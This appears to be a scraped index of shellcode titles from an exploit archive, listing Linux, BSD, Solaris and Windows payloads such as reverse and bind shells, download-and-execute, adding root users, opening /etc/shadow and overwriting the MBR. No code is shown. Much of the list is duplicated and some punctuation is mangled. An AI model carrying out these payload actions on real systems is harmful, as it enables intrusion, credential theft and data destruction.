Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)
Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)
Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)
Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)
Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)
Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)
Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)
Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)
Linux/x86 - reboot() Shellcode (20 bytes)
Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)
Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)
Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)
Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)
Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)
Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)
Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)
Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)
Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)
Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)
Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)
Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)
Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)
Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)
Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)
Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)
Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)
Linux/x86 - reboot() Shellcode (20 bytes)
Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)
Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)
Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)
Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)
Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)
Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)
Linux/x86 - _exit(1); Shellcode (7 bytes)
Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)
Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)
Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)
Linux/x86 - upload + exec Shellcode (189 bytes)
Linux/x86 - setreuid + execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)
Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)
Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)
Linux/x86 - execve code Shellcode (23 bytes)
Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)
Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)
Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)
Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)
Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)
Linux/x86 - Kill Snort Shellcode (151 bytes)
Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)
Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)
Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)
Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)
Linux/x86 - execve /bin/sh Shellcode (29 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)
Linux/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/x86 - execve /bin/sh Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User Shellcode (104 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)
Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)
Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)
Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)
Linux/x86 - dup2(0_0) + dup2(0_1) + dup2(0_2) Shellcode (15 bytes)
Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes)
Linux/x86 - _exit(1) Shellcode (7 bytes)
Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)
Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)
Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)
Linux/x86 - upload + exec Shellcode (189 bytes)
Linux/x86 - setreuid + execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)
Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)
Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)
Linux/x86 - execve code Shellcode (23 bytes)
Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)
Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)
Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)
Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)
Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)
Linux/x86 - Kill Snort Shellcode (151 bytes)
Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)
Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)
Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)
Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)
Linux/x86 - execve /bin/sh Shellcode (29 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)
Linux/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/x86 - execve /bin/sh Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User Shellcode (104 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)
Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)
Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)

SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)
SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)

Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode
Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)
Windows - DCOM RPC2 Universal Shellcode
Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Linux/x86 - Kill All Processes Shellcode (9 bytes)
Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve Shellcode (51 bytes)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)
Windows - DCOM RPC2 Universal Shellcode
Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Linux/x86 - Kill All Processes Shellcode (9 bytes)
Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve Shellcode (51 bytes)
Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)
Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)
Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)
Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)
Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)
Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)
Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)
Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)
Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)
Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)
Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (8 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Linux/x86 - Disable modsecurity Shellcode (64 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)
Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (8 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Linux/x86 - Disable modsecurity Shellcode (64 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)
Linux/x86 - DoS Badger Game Shellcode (6 bytes)
Linux/x86 - DoS SLoc Shellcode (55 bytes)
Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)
Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)
Linux/x86 - DoS Badger Game Shellcode (6 bytes)
Linux/x86 - DoS SLoc Shellcode (55 bytes)
Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)
Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)
Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)
Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)
Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)
Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)
Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)
Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)
Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)
Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)
Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)
Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)
Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)
Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - Disable ASLR Security Shellcode (106 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)
Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - Kill All Running Process Shellcode (11 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)
Linux/x86 - Hard Reboot Shellcode (29 bytes)
Linux/x86 - Hard Reboot Shellcode (33 bytes)
Linux/x86 - Disable ASLR Security Shellcode (106 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)
Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)
Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - Kill All Running Process Shellcode (11 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)
Linux/x86 - Hard Reboot Shellcode (29 bytes)
Linux/x86 - Hard Reboot Shellcode (33 bytes)
Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)
Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)
Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)
